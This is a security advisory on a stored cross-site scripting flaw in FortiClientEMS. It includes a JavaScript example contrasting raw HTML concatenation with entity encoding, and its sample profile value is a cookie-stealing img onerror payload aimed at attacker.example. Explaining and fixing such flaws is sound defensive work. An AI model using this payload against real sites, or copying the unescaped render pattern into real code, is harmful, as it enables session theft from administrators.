PSIRT Advisory

XSS vulnerability in FortiClientEMS

Summary

An Improper Neutralization of Input During Web Page Generation (cross-site scripting) vulnerability in FortiClientEMS may allow a remote attacker to execute unauthorized code by injecting a malicious payload into the user profile of a FortiClient instance managed by the vulnerable system; because the profile data is rendered into the EMS web interface without proper neutralization, the injected script runs in the browser of an EMS user who views that profile.
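The pattern behind this weakness class, as an added illustration that is not FortiClientEMS code and not part of the advisory: an attacker-controlled profile field reported by a managed endpoint is stored and later written into a management web page. The profile fields, the page layout and the sample payload are constructed for the example; the point is the contrast between concatenating the value raw and entity-encoding it at the point it enters HTML.

```javascript
// Hypothetical illustration of CWE-79 (stored XSS) in the shape the advisory
// describes. Not FortiClientEMS code; field names and markup are assumptions.

// Constructed sample input: a user profile as a managed client might report
// it, with a hostile value planted in a free-text field.
const hostileProfile = {
  username: 'jdoe',
  displayName:
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Minimal HTML entity encoder for text placed in element content or in a
// double-quoted attribute value. Other contexts (JavaScript strings, URLs,
// CSS) need their own encoders; this one is not sufficient for them.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: profile fields are concatenated straight into the page,
// so a value containing markup becomes live markup in the viewer's browser.
function renderProfileVulnerable(profile) {
  return `<tr><td>${profile.username}</td><td>${profile.displayName}</td></tr>`;
}

// Hardened pattern: every untrusted value is entity-encoded where it is
// written into HTML, regardless of any validation done when it was stored.
function renderProfileHardened(profile) {
  return `<tr><td>${escapeHtml(profile.username)}</td><td>${escapeHtml(profile.displayName)}</td></tr>`;
}

// Check used below: did the injected tag survive into the rendered page as a
// real tag (a literal "<img"), rather than as the text "&lt;img"?
function injectedTagSurvives(html) {
  return /<img\b/i.test(html);
}

console.log('vulnerable:', renderProfileVulnerable(hostileProfile));
console.log('hardened:  ', renderProfileHardened(hostileProfile));
```

Output encoding at render time is the fix that matches the CWE; input validation on the endpoint side is not a substitute, since the managed client is exactly the party the attacker controls. A Content Security Policy that forbids inline script is worthwhile defence in depth but does not replace the encoding.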

Impact

Unauthorized code execution

Affected Products

FortiClientEMS version 6.2.0 and below.

Solutions

Please upgrade to FortiClientEMS version 6.2.1 or above.

Acknowledgement

Fortinet is pleased to thank Artem Dimitriev for reporting this issue under responsible disclosure.